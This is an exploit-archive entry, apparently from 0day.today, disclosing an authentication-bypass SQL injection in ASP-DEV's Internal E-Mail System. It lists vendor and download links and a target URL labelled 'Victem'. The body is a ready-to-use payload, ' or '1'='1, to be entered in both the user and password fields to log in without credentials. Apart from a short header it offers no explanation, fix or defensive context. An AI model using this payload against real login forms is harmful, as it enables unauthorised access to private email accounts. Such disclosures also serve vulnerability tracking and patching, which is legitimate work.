id: 4440
date: 12/14/2008
title: ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln
author: Pouya_Server
cves: 

===============================================================
ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln
===============================================================


#########################################################
---------------------------------------------------------
Portal Name: Internal E-Mail System
Vendor : http://asp-dev.com/main.asp?page=41
Download : http://asp-dev.com/download.asp?did=4
Author : Pouya_Server 
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: ' or '1'='1
pass: ' or '1'='1
 
---------------------------------
Victem :
http://asp-dev.com/message



#  0day.today [2023-03-25]  #